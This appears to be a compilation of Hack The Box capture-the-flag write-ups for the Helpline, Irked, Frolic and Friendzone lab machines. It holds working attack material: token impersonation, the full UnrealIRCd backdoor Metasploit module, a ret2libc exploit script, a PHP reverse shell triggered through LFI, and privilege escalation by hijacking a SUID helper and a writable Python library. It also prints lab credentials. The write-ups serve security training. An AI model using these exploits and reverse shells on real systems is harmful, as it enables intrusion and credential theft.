HELPLINE\leo
HELPLINE\tolu
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token 'HELPLINE\leo'
[+] Delegation token available
[+] Successfully impersonated user HELPLINE\leo
meterpreter > shell -t 
Process 5344 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\System32\spool\drivers\color>whoami
whoami
helpline\leo

C:\Windows\System32\spool\drivers\color>

Now we can read admin-pass.xml :

C:\Windows\System32\spool\drivers\color>cd c:\users\leo\desktop
cd c:\users\leo\desktop

c:\Users\leo\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of c:\Users\leo\Desktop

01/15/2019  01:21 AM    <DIR>          .
01/15/2019  01:21 AM    <DIR>          ..
01/15/2019  01:18 AM               526 admin-pass.xml
               1 File(s)            526 bytes
               2 Dir(s)   5,719,506,944 bytes free

c:\Users\leo\Desktop>type admin-pass.xml
type admin-pass.xml
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa

c:\Users\leo\Desktop>

I used Invoke-Command again and used Get-Content to read admin-pass.xml instead of putting the password in a variable.

c:\Users\leo\Desktop>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\leo\Desktop> $username = "Helpline\Administrator"
$username = "Helpline\Administrator"
PS C:\Users\leo\Desktop> $password = "admin-pass.xml"
$password = "admin-pass.xml"
PS C:\Users\leo\Desktop> $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, (Get-Content $password | ConvertTo-SecureString)
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, (Get-Content $password | ConvertTo-SecureString)
PS C:\Users\leo\Desktop> Invoke-Command -ComputerName HELPLINE -Credential $credential -Authentication credssp -ScriptBlock {type C:\Users\Administrator\Desktop\root.txt}
Invoke-Command -ComputerName HELPLINE -Credential $credential -Authentication credssp -ScriptBlock {type C:\Users\Administrator\Desktop\root.txt}
d81*****a2c

We owned root !
Credits to : https://0xrick.github.io/hack-the-box/helpline/

Alternative way from windows:

Instead of using the VPN on Windows we can use IP forwarding on linux. First on linux,

root@kali:~/htb# sudo sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
root@kali:~/htb# /sbin/iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
root@kali:~/htb# /sbin/iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT

Change eth0 to your VM connected interface. Now on windows, execute the command:

C:\WINDOWS\system32>route add 10.10.10.0/24 192.168.1.21
OK!

Now we should be able to ping all the hackthebox boxxes from Windows.

C:\WINDOWS\system32>ping helpline

Pinging helpline [10.10.10.132] with 32 bytes of data:
Reply from 10.10.10.132: bytes=32 time=22ms TTL=126
Reply from 10.10.10.132: bytes=32 time=22ms TTL=126
Reply from 10.10.10.132: bytes=32 time=22ms TTL=126
Reply from 10.10.10.132: bytes=32 time=22ms TTL=126

Ping statistics for 10.10.10.132:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 22ms, Maximum = 22ms, Average = 22ms

According to this blog post the group Event Log Readers gives non-admin users access to System logs. We can use this to our advantage if we can find any sensitive information in the logs. The security logs could contain potential user information. We can export such logs using
wevtutil utility.

However, we are denied access. This is due to the kerberos double hop problem. We can overcome this by using CredSSP authentication. For this we need to configure a Windows VM.
To enable CredSSP authentication on Windows 10, the following steps are performed.

    •  Edit C:\Windows\System32\drivers\etc\hosts, adding the IP address for
      
      helpline
    •  Start the "Windows Remote Management (WS-Management)" service if it isn't already using Powershell type “Enable-PSRemoting -Force”.
      
      -
    •  From an elevated PowerShell console, run
PS C:\WINDOWS\system32> Enable-WSManCredSSP -Role "Client" -DelegateComputer "*"

CredSSP Authentication Configuration for WS-Management
CredSSP authentication allows the user credentials on this computer to be sent to a remote computer. If you use CredSSP
 authentication for a connection to a malicious or compromised computer, that computer will have access to your user
name and password. For more information, see the Enable-WSManCredSSP Help topic.
Do you want to enable CredSSP authentication?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y

cfg         : http://schemas.microsoft.com/wbem/wsman/1/config/client/auth
lang        : en-GB
Basic       : true
Digest      : true
Kerberos    : true
Negotiate   : true
Certificate : true
CredSSP     : true
  • Open gpedit.msc with administrative privileges, and navigate through to :
    
    Computer Configuration > Administrative Templates > System > Credentials
    
    Delegation > Allow Delegating Fresh Credentials with NTLM only server
    
    authentication.
    
    Click "Show..." and add WSMAN/*
    
    Click OK to save changes and exit out

We should now be able to login as alice using credssp authentication.

PS C:\Users\jacco> $pass = ConvertTo-SecureString '$sys4ops@megabank!' -AsPlainText -Force
PS C:\Users\jacco> $cred = new-object System.Management.Automation.PSCredential( 'alice' , $pass)
PS C:\Users\jacco> $session = New-PSSession -ComputerName 10.10.10.132 -Credential $cred -Authentication Credssp
PS C:\Users\jacco> Enter-PSSession $session
[10.10.10.132]: PS C:\Users\alice\Documents> whoami
helpline\alice

Author Jacco Straathof

HTB – Irked

Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of irked is 10.10.10.117

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

root@kali:~/htb# nmap -p- -sV 10.10.10.117 --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-04 05:49 EDT
Nmap scan report for 10.10.10.117
Host is up (0.027s latency).
Not shown: 65427 closed ports, 101 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
34772/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds

Enumeration

I tried to extract hidden information with the help of steghide, but we need to find the passphrase for that.

root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase:

Exploiting

Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, it runs on 6697 here. I pwned the victim machine successfully after running the module.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 10.10.14.5:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jt9flkHuSYLifEoc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jt9flkHuSYLifEoc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.117:34526) at 2019-09-04 05:07:52 -0400

python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ cd /home
cd /home
ircd@irked:/home$ 
ircd@irked:/home$ ls
ls
djmardov ircd
ircd@irked:/home$ 
ircd@irked:/home$ cd djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ 
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
root@kali:~/htb# curl http://10.10.10.117
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
root@kali:~/htb# curl http://10.10.10.117/irked.jpg -o irked.jpg
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 34697 100 34697 0 0 491k 0 --:--:-- --:--:-- --:--:-- 491k
root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase: UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@kali:~/htb# cat pass.txt
Kab6h+m+bbp2J:HG
I found another password from the inside pass.txt file “Kab6h+m+bbp2J: HG.”
Without Metasploit:

nmap also gave me the name of the irc server, UnrealIRCd. searchsploit shows there are exploits if the version is 3.2.8.1:

root@kali:~/htb# searchsploit UnrealIRCd
---------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/htb# searchsploit -m exploits/linux/remote/16922.rb
Exploit: UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16922/
Path: /usr/share/exploitdb/exploits/linux/remote/16922.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /root/htb/16922.rb

root@kali:~/htb# cat 16922.rb 
##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
			'Description'    => %q{
					This module exploits a malicious backdoor that was added to the
				Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
				Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11227 $',
			'References'     =>
				[
					[ 'CVE', '2010-2075' ],
					[ 'OSVDB', '65445' ],
					[ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 12 2010'))

		register_options(
			[
				Opt::RPORT(6667)
			], self.class)
	end

	def exploit
		connect

		print_status("Connected to #{rhost}:#{rport}...")
		banner = sock.get_once(-1, 30)
		banner.to_s.split("\n").each do |line|
			print_line("    #{line}")
		end

		print_status("Sending backdoor command...")
		sock.put("AB;" + payload.encoded + "\n")

		handler
		disconnect
	end
endroot@kali:~/htb#

It looks like the exploit is to connect and then send “AB;” + the payload + “\n”.

Privilege Escalation

First, I open the user.txt file and finish the first challenge. Now let’s penetrate more to find the root.txt file, and that’s why we need to increase the privilege, so I’m trying to find out if there’s any suid permission script.Here /usr/bin/viewuser looks more interesting, let’s check it out.

root@kali:~/htb# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep  4 05:13:43 2019 from 10.10.14.5
djmardov@irked:~$ pwd
/home/djmardov
djmardov@irked:~$ cat Documents/user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e
djmardov@irked:/$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
djmardov@irked:/$ ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (10.10.14.5)
sh: 1: /tmp/listusers: not found
djmardov@irked:/$ echo '/bin/sh' > /tmp/listusers
djmardov@irked:/$ chmod 777 /tmp/listusers
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (10.10.14.5)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# cd /root
# ls
pass.txt root.txt
# cat root.txt
8d8*****af3

So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.

So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.

Now we have a root shell

Credits to hackingarticles.in

Author: Jacco Straathof

HTB – Frolic


Also, if you do not know what a ret2libc exploit is, here is a guide manulqwerty did a while ago: Return to libc guide
If you want to see a detailed explanation I recommend the videos of IppSec).

Video

Write-Up

Enumeration

As always, the first thing will be a scan of all the ports with nmap :

1
nmap -sC -sV 10.10.10.111


As you can see, there is a SSH, a SMB and an HTTP.

We will enumerate the web with dirsearch recursively.

1
dirsearch -u http://frolic.htb:9999/ -r -e php -t 50 -x 403


Accessing to http://frolic.htb/admin/success.html we see a code Okk!

In http://frolic.htb/asdiSIAJJ0QWE9JAS we find a base64 that after decoding it we see that it is a ZIP with a password.

We can brute force the zip with fcrackzip:

1
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt fr.zip


The ZIP contains a file index.php that is an hexadecimal code. We translate the hexadecimal to ascii, getting a base64 that contains a brainfuck code.

After decoding the Brainfuck code, we get: idkwhatispass
Reviewing the results of Dirsearch we see that there’s a http://frolic.htb/dev/backup

With the credentials admin:idkwhatispass we can access the playsms.

Exploitation

The PlaySMS is vulnerable, we can get shell through a metasploitmodule: multi/http/playsms_uploadcsv_exec

1
2
3
4
5
6
use multi/http/playsms_uploadcsv_exec
set rhosts 10.10.10.111
set lhost tun0
set rport 9999   
set targeturi /playsms/
set password idkwhatispass

Post-Exploitation

To access the root user, we will have to be able to develop an exploit for a binary with the NX bit activated but without ASLR in the system. I will use the ret2libc technique.
The first thing is to look for binaries with the SUID bit active using find:

1
find / -perm -4000 2>/dev/null


We found the binary: /home/ayush/.binary/rop that belongs to the root user.
Check that ASLR is disabled:

1
cat /proc/sys/kernel/randomize_va_space


As we saw in the ret-2-libc guide, we need the length of our padding and the system, exit and /bin/sh addresses in the libc library.
We are going to make a template that we will be completing:

1
2
3
4
5
6
7
8
9
10
11
12
import struct
def m32(dir):
    return struct.pack("I",dir)
padding =
base =
sys = m32(base + )
exit = m32(base + )
binsh = m32(base + )
print padding + sys + exit + binsh

Let’s find the length of our padding with msf-pattern:

The length of our fill will be 52 bytes, let’s look for the addresses of the libc librarysystemexit and /bin/sh.

Our exploit:

1
2
3
4
5
6
7
8
9
10
11
12
import struct
def m32(dir):
    return struct.pack("I",dir)
padding = "A" * 52
base = 0xb7e19000
sys = m32(base + 0x0003ada0)
exit = m32(base + 0x0002e9d0)
binsh = m32(base + 0x15ba0b)
print padding + sys + exit + binsh

Let’s execute it

1
./rop $(python /tmp/exploit)

All credits go to: © 2019 IRONHACKERS

 

HTB – Friendzone

Let’s start off with scanning with the nmap to check open ports.

c:\PENTEST>nmap -sC -sV 10.10.10.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-30 14:58 W. Europe Summer Time
Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.79% done; ETC: 14:58 (0:00:00 remaining)
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.79% done; ETC: 14:58 (0:00:00 remaining)
Nmap scan report for administrator1.friendzone.red (10.10.10.123)
Host is up (0.016s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: FriendZone Corp Administrator login page
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m36s, deviation: 1h43m54s, median: -37s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-08-30T15:57:54+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-30 14:57:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.62 seconds

c:\PENTEST>

Enumeration

On exploring, vulnerable machine IP in the web browser, it welcomes us with following web page as shown below.

Here also I notice friendzone.red and this could be a clue for proceeding further. As per nmap scan result, port 53 is open for TCP which means there may be some possibilities for DNS Zone Transfer.

I didn’t find any other useful information on the home page, so I try to enumerate web directories with the help of DIRB. But this was also not worthwhile for us because the enumerated result was not valuable when further inspected.

Consequently, I switch to another enumeration service and it was a null session SMB enumeration. So, with the help of SMBmap, which is a Linux utility, we try to enumerate smb shared directories.

root@kali:~/htb# smbmap -H 10.10.10.123 -r
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.123...
[+] IP: 10.10.10.123:445	Name: 10.10.10.123                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	Files                                             	NO ACCESS
	general                                           	READ ONLY
	./                                                 
	dr--r--r--                0 Wed Jan 16 15:10:51 2019	.
	dr--r--r--                0 Wed Jan 23 16:51:02 2019	..
	fr--r--r--               57 Tue Oct  9 19:52:42 2018	creds.txt
	Development                                       	READ, WRITE
	./                                                 
	dr--r--r--                0 Fri Aug 30 09:04:55 2019	.
	dr--r--r--                0 Wed Jan 23 16:51:02 2019	..
	fr--r--r--             5492 Thu Aug 29 08:04:05 2019	php-reverse-shell.php
	IPC$                                              	NO ACCESS
root@kali:~/htb#

I found two shared directories and among those /general had read-only permissions and /Development has read/write both permissions. so, when we accessed /general directory, we obtained a text file named as “creds”.

In this file, I found the following credential which could be used later.

admin:WORKWORKHhallelujah@#

Further, I saved /administrator1.friendzone.red.  in the /etc/hosts file for accessing this domain.

On the exploring administrator1.friendzone.red we got a login portal where I submitted the credential that we have found above.

So, we found another hint “/dashboard.php” which was a web directory.

On enumerating /dashboard.php we found following web page; here it gave a message “image_name param is missing”.

Therefore, we injected “default is image_id=a.jpg&pagename=timestamp” in the URL and obtain following web page where we notice timestamp, and this looked little suspicious towards LFI.

Exploiting LFI

To ensure that I try to call timestamp.php and by obtaining time stamp on the screen it was confirmed that it is vulnerable to LFI. Now let’s extend LFI to RCE to obtain shell of the host machine.

As we knew that /Development is the only directory that has read/write both permissions, hence we can inject our malicious file inside this directory and execute the backdoor by exploiting LFI to obtain a reverse connection.

Then I have used pentest’s monkey php reverse shell with little modification such $lhost & $lport as a backdoor that to be injected inside the host machine.

So, we connect to SMB with the help of smbclient and upload the php-reverse-shell inside /Development. Simultaneously we launched netcat listener in a new terminal to obtain a reverse connection from the host machine.

Then execute the uploaded php backdoor with the privilege of LFI as shown below:

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell

As soon as we executed above URL in the browser, we have access netcat session and to obtain proper shell we import python pty one-liner and found our 1st flag inside /home/friend.

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from administrator1.friendzone.red [10.10.10.123] 49888
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
15:25:48 up 17:31, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/$ pwd
pwd
/
www-data@FriendZone:/$ cat /home/friend/user.txt
cat /home/friend/user.txt
a9e*****a11
www-data@FriendZone:/$ cd /var/www
cd /var/www
www-data@FriendZone:/var/www$ ls
ls
admin       friendzoneportal       html             uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

www-data@FriendZone:/var/www$


Privilege Escalation

So, with the help of above-enumerated creds, we try to access ssh and luckily, we connected to ssh and try to identify weak permission file or role for escalating privileges to access root shell or root flag.

C:\Users\jacco>ssh friend@10.10.10.123
friend@10.10.10.123's password: Agpyu12!0.213$
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ cd /tmp
friend@FriendZone:/tmp$ ls
systemd-private-22dff15053e947a595068d3196c0fb1f-apache2.service-KTH0XF
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-resolved.service-efnbiY
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-timesyncd.service-arbkWm
vmware-root_243-2125741226
friend@FriendZone:/tmp$ wget http://10.10.14.12/pspy64
--2019-08-30 15:39:18-- http://10.10.14.12/pspy64
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=================================================>] 2.94M 6.73MB/s in 0.4s

2019-08-30 15:39:18 (6.73 MB/s) - ‘pspy64’ saved [3078592/3078592]

friend@FriendZone:/tmp$ chmod 777 pspy64
friend@FriendZone:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2019/08/30 15:40:50 CMD: UID=0 PID=98 |
2019/08/30 15:40:50 CMD: UID=0 PID=9 |
2019/08/30 15:40:50 CMD: UID=0 PID=89 |
2019/08/30 15:40:50 CMD: UID=0 PID=859 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=0 PID=857 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=0 PID=856 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=107 PID=853 | /usr/sbin/exim4 -bd -q30m
2019/08/30 15:40:50 CMD: UID=0 PID=85 |
--snip--
2019/08/30 15:40:50 CMD: UID=0 PID=10 |
2019/08/30 15:40:50 CMD: UID=0 PID=1 | /sbin/init splash
2019/08/30 15:42:01 CMD: UID=0 PID=14751 | /bin/sh -c /opt/server_admin/reporter.py
2019/08/30 15:42:01 CMD: UID=0 PID=14750 | /bin/sh -c /opt/server_admin/reporter.py
2019/08/30 15:42:01 CMD: UID=0 PID=14749 | /usr/sbin/CRON -f
^CExiting program... (interrupt)
friend@FriendZone:/tmp$

On running pspy64s, we notice that a python is executing by root which was surprising to us.

So, I decided to take a look at what is script was doing, therefore I used the cat command to read what this script is running. I didn’t find any useful operation is being executed by this script other than import a python library “os.py” hence I take its advantage in privilege escalation.

friend@FriendZone:/tmp$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
friend@FriendZone:/tmp$

Taking privilege of python library, we can create a bogus python library named as os.py to call root flag through this file.

friend@FriendZone:/tmp$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25952 Aug 30 15:47 /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ ls
flag
pspy64
systemd-private-22dff15053e947a595068d3196c0fb1f-apache2.service-KTH0XF
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-resolved.service-efnbiY
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-timesyncd.service-arbkWm
vmware-root_243-2125741226
friend@FriendZone:/tmp$ cat flag
b0e*****90c7
friend@FriendZone:/tmp$

or to catch a root shell
